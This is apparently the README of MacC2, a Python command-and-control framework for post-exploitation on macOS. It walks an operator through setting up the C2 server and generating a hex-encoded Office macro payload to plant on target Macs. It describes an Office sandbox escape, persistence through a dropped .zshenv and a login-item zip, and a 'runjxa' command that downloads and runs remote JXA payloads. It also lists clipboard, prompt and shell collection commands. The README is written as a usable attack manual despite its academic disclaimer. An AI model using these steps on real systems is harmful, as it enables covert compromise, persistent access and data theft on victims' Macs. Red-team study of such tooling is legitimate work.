/MacC2

python-based Mac Command and Control that uses internal API calls instead of command line utilities. Author: Cedric Owens

Primary LanguagePythonBSD 3-Clause "New" or "Revised" LicenseBSD-3-Clause

MacC2

MacC2 is a macOS post exploitation tool written in python that uses Objective C calls or python libraries as opposed to command line executions. The client is written in python2, which though deprecated is still being shipped with base Big Sur installs. It is possible down the road that Apple will remove python2 (or python altogether) from base macOS installs but as of Nov 2020 this is not the case. Apple plans to eventually remove scripting runtimes from base macOS installs, but it is unknown when that will happen since Big Sur includes python.


Latest Addition: May 2021

  • Added the MS Office Sandbox escape technique discovered by Madhav Bhatt in his blog post at: https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c.

  • Implementation in MacC2: When you get a callback from the MS Office macro payload (which will be sandboxed) and you run the persist command, MacC2 will drop two files to disk: $HOME/~$IT-Provision.zip and $HOME/Library/WebKit/~$IT-Provision.py. The .zip contains a .zshenv file, which runs the python payload at /Library/WebKit/$IT-Provision.py. Once the system is rebooted, the .zip login item will automatically be extracted and drop the .zshenv file to the user's home directory, which will execute when a new terminal window is opened.

You can set up the server locally or you can use the docker setup I have included in this repo. Instructions below:


Instructions for Running Using Docker:

If you do not already have docker set up:

  1. chmod +x install_docker_linux.sh
  2. sudo ./install_docker_linux.sh

Next:

  1. chmod +x setup.sh
  2. sudo ./setup.sh (this will create an untrusted ssl cert and key, generate a macro file for the server and port you specify (will drop the macro in macro.txt locally), build macc2-docker, and run the MacC2 server inside of macc2-container in interactive mode)
  3. when prompted, enter the IP/hostname of the MacC2 server
    Image
  4. when prompted, enter the port that the MacC2 server will listen on
    Image
  5. A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port you specified.
    Image
  6. Docker will install the aiohttp python3 dependency, build macc2-docker, and will run the MacC2 Server in a container. Once finished the MacC2 server will listen on the specified port:
    Image
  7. You can run docker ps and validate that the MacC2 server is running
  8. The setup script also sets up a shared mount between the container and the host. On the host, you can browse to /var/lib/docker/volumes/macc2/_data in order to access MacC2_client.py as well as macro.txt which you will need to port over to the target host.

You can then either copy the MacC2_client.py file over to the client and execute for a callback or you can import the macro.txt macro into an Office document and "Enable Macros" when opening for a callback on the client.


Running Locally (Without Using Docker)

If you opt to not use docker, you can set up the server locally using the steps below:

Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:

pip install aiohttp (if you encounter an error ensure that pip is pointing to python3, since aiohttp is a python3 library):

python3 -m pip install --upgrade --force pip

On C2 Server:

  1. Set up ssl (note: use a key size of at least 2048)

If you do not have your own cert, you can use the following to generate a self signed cert:

  • 1: openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key

  • 2: openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem

note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately

  1. Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. You can copy and paste the contents of macro.text into an MS Office document:

Usage:

python3 macro_generatory.py -s [C2 Server IP/domain] -p [C2 Server Port]

-Example:

Image

  1. Start the generated MacC2_server.py script to listen for a connection:

Image

On Client Side (the target mac host):

  1. If you desire to not be limited by the mac sandbox and want more functionality, you may opt to copy the MacC2_client.py script to the client (assuming you have access).

  2. On the client, run the MacC2_client.py script: python MacC2_client.py

Image

  1. On the server, you will see an inbound connection. Example below:

Image


Using MacC2

After you receive a connection, you can use the "help" command on the server to get a list of built-in commands available. You can enter one of these commands. After entering a command and pressing Enter, the command is queued up (allows you to enter multiple commands to be executed by the client). Once you type "done" and hit Enter, all of the queued commands will be sent to the client for execution.

Image

Each command is pretty straightforward. The command options that are not OPSEC safe (i.e., command line executions or cause pop ups) are also flagged in red from the help menu.

Functions of Note:

  • You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. Then you can provide the url to the hosted file to MacC2 using the runjxa command to have MacC2 download and execute the Mythic .JXA payload:

>>> runjxa <url_to_JXA_.js_payload>

Note: If you gain access using the MS Office macro, then the persistence method will not work due to sandboxing. The files will still be dropped and the login item will still be inserted but upon reboot the quarantine attribute prevents the persistence from executing


Additional Info

The MacC2 server uses aiohttp to easily allow for asynchronous web comms. To ensure that only MacC2 agents can access the server, the server includes the following:

  • A specific user agent string check (if a request fails this check it receives a 404 Not Found)

  • A specific token (if a request failes this check it receives a 404 Not Found)

The operator flow after setting everything up and getting a callback is:

  • view help menu for command options

  • enter command name and press enter for each command you want to run

  • enter "done" and press enter to have the queued commands sent to the client for execution

  • NOTE: The default sleep is 10 seconds. The operator can change that by using the sleep [numberofseconds] command.

  • NOTE: The MacC2 server currently does not have a way to conveniently switch between sessions when multiple clients connect. Instead the server auto switches between sessions after each command executed. So the operator will need to pay attention to the IP in the connection to know which session is being interacted with.


Macro Info

MacC2 includes the MS Office sandbox escape technique identified by Madhav Bhatt in his blog post at: https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c. However, if using the MS Office macro payload, the system must reboot in order for the escape to take effect. Functions that DO work from the sandbox include:

  • runjxa

  • systeminfo

  • persist: MacC2 will drop two files to disk: /$IT-Provision.zip and /Library/WebKit/$IT-Provision.py. The .zip contains a .zshenv file, which runs the python payload at /Library/WebKit/$IT-Provision.py. Once the system is rebooted, the .zip login item will automatically be extracted and drop the .zshenv file to the user's home directory, which will execute when a new terminal window is opened.

  • addresses

  • prompt

  • clipboard

  • shell (not OPSEC safe)

  • spawn (not OPSEC safe)

  • cd and listdir (sandbox prevents access for most directories but you can see the root '/' directory and potentially others as well)


DISCLAIMER

This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.